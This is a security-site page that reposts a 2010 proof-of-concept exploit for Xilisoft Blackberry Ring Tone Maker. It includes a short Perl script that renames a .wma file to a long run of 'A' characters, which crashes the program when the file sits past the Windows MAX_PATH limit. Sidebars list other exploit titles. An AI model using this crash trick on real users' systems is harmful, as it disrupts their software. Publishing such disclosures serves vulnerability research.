首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Xilisoft Blackberry Ring Tone Maker local crash exploit that creates a malicious
来源:vfocus.net 作者:chap0 发布时间:2010-04-01  
# Exploit Title: Xilisoft Blackberry Ring Tone Maker .wma Local Crash 
# Date: March 29, 2010
# Software Link: [http://www.xilisoft.com/blackberry-ringtone-maker.html]
# Version: 1.0.12 build-0326
# Tested on: Windows XP SP3 / Windows 7
# Cost: 9.95 USD
# Author: chap0
# Site: http://www.setfreesecurity.com
# Email: chap0x90[at]gmail[dot]com
#
# Xilisoft Blackberry Ring Tone Maker software crashes when you open a legit .wma file that 
# is beyond the maximum length for a path. [MAX_PATH, which is defined as 260 characters] 
# Reference: [http://msdn.microsoft.com/en-us/library/aa365247%28VS.85%29.aspx#maxpath]
#
# To exploit: Run the code to change a legit .wma file and then make sure that the file 
# is placed on the Windows OS deep enough to open pass the 260 "MAX PATH
#
#Ex: C:\Documents and Settings\victim\Desktop\name_of_file.wma
#
# Pull your sickness from my throat, Let me breath the truth
# Greetz: GOD, The wife for support, 4lex, & C.I.A
#
#!/usr/bin/perl

print "Name That Song! ";

chomp ($song = <STDIN>);
$junk = "\x41" x 214;

rename ("$song.wma", "$junk.wma");
print "Bury deep! \n";
exit;

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MyBB 2002-2010 exploit
·Free MP3 CD Ripper 2.6 0-day
·Easy-Clanpage <= v2.2 multiple
·HP OpenView NNM OvWebHelp.exe
·Centreon IT & Network Monitori
·CompleteFTP Server Directory T
·Free MP3 CD Ripper 2.6 (wav) 1
·Easy Icon Maker .ico File Read
·CDTrustee .BAK Local Crash POC
·Xilisoft Blackberry Ring Tone
·WM Downloader 3.0.0.9 (.asx) L
·ASX to MP3 Converter Version 3
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved